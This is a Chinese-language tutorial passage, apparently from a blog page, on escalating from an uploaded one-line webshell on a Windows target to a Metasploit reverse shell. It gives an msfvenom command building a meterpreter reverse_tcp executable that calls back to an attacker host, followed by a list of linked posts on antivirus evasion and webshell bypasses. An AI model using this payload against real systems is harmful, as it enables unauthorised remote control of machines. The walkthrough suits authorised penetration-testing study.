现在情况是已经上传了一句话木马,可以执行如:ls、pwd、whoami等命令;不管是python、bash 还是 perl 都反弹不了, 偷不了懒了,就上 msf 吧。

一、windows一句话木马反弹shell思路

前提:目标在有webshell权限下,利用kali的msf制作木马反弹shell过程。

启动kali中的msf

┌──(root@SC)-[~]
└─# msfconsole

生成exe类型反弹型木马,LHOST=kali 的 ip。

msf6 > msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.173.4 LPORT=4444 -f exe -o shell.exe
[*] exec: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.173.4 LPORT=4444 -f exe -o shell.exe[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload

APT级全面免杀拿Shell相关推荐

  1. 浅谈PHP木马免杀之如何过狗过宝塔过阿里云D盾

    PHP免杀方法有很多,加密混淆字符转换拆分等等都可以达到目的,下面来简单介绍几种免杀PHP大马的方法,一句话思路也是一样 拿我很喜欢的一款php大马来示范,这个马支持cmd命令,编辑文件不会空白,界面 ...

  2. 从后渗透分析应急响应的那些事儿(二)免杀初识篇

    从后渗透分析应急响应的那些事儿(二)免杀初识篇 文章首发于freebuf Tidesec专栏 https://www.freebuf.com/column/204005.html,转载到个人博客记录, ...

  3. 实测FourEye免杀 vs 实战化白帽子如何学习

    文章来源|MS08067 内网安全知识星球 本文作者:Ryze(Ms08067内网安全小组成员) 内网纵横四海  认准Ms08067 本文目的只为了解免杀技术和配合攻击技术达到一定攻击效果,文中所涉及 ...

  4. 在linux下做源码免杀,Cobaltstrike免杀从源码级到落地思维转变

    文章来源: https://www.freebuf.com/articles/web/258988.html 前言 距离上一篇文章<那些FastJson漏洞不为人知的事情(开发角度)>已经 ...

  5. Veil生成免杀payload 渗透win10 获取靶机shell

    一:实验环境 两台机器处于同网段 攻击机:kali 192.168.115.134 靶机:win10 192.168.115.1 二:Veil下载.安装.使用 kali里默认没有安装Veil,我们通过 ...

  6. shell 免杀aspx_对于asp免杀webshell的一些总结

    0x00 前言 现在asp不多但是还是有,还是写一篇文章来简单的介绍下asp的免杀吧,相对于php我们的asp还是不够灵活,其中一些思路参考于LandGrey的文章 偷偷介绍下公众号:404安全 0x ...

  7. shell 免杀aspx_记一次aspx网站渗透

    通过前期信息搜集获取到目标站的80xx端口 发现一处源码泄露 查看配置文件 登录manage.aspx 上传shell 发现安装了TeamViewer 看下进程如果运行tv的话,可直接读取其远程的账号 ...

  8. APT之木马静态免杀

    前言 这篇文章主要是记录手动编写代码进行木马免杀,使用工具也可以免杀,只不过太脚本小子了,而且工具的特征也容易被杀软抓到,指不定哪天就用不了了,所以要学一下手动去免杀木马,也方便以后开发一个只属于自己 ...

  9. 【红队APT】钓鱼篇Office-CVE漏洞RLO隐藏压缩包释放免杀打包捆绑

    文章目录 文件后缀-钓鱼伪装-RLO 压缩文件-自解压-释放执行 Office套件-CVE漏洞-MSF&CS Microsoft MSDT CVE-2022-30190 代码执行 Micros ...

最新文章

  1. Failure [INSTALL_FAILED_ALREADY_EXISTS
  2. 95. Unique Binary Search Trees II 不同的二叉搜索树 II
  3. 在Metro App中显示Toast notification
  4. 基本类型数组转包装类型数组工具类
  5. filter IE滤镜(Internet Explorer)CSS
  6. 微信小程序之下拉刷新,上拉更多列表实现
  7. csharp与java的区别_C#与JAVA之比较(1)
  8. python爬虫小项目价格_爬虫项目怎么收费?
  9. 高速PCB设计的一些注意事项
  10. Openg~lopengl中文手册4.5
  11. 一个完全免费的在线文字云网站
  12. 播放量破4亿。《梦华录》创2022年国产剧豆瓣最高开分,它凭何爆火?
  13. 计网实验-1_Cisco Package Trace:Basic switch setup
  14. 在子域下安装Exchange服务器并批量生成用户为每一位用户建立邮箱
  15. 波兰式与逆波兰式的转换和表达式求值
  16. onvif/rtsp转gb28181协议,无缝对接国标平台
  17. JVM成神之路-JVM引用模型
  18. stagefright框架(四)-Video Buffer傳輸流程 .
  19. Google Play集成介绍
  20. 苹果id密码忘了怎么办?轻松重置,赶紧收藏!

热门文章

  1. 冬意正浓-2018年终总结
  2. 常见档案数据存储载体介绍及特性比较
  3. 正弦与余弦曲线的波形图显示(数组与簇)
  4. InstallShield 软件打包完整教程(含添加自定义依赖环境)
  5. 棒球队训练课程教案·棒球1号位
  6. android armeabi和x86,Android下不同CPU類型:armeabi和armeabi-v7a以及mips和x86
  7. 如何快速入门Comsol?
  8. 【精解】EOS TPS 多维实测
  9. intellij idea svn合并分支方法
  10. 使用STM32 ST-LINK Utility下载程序教程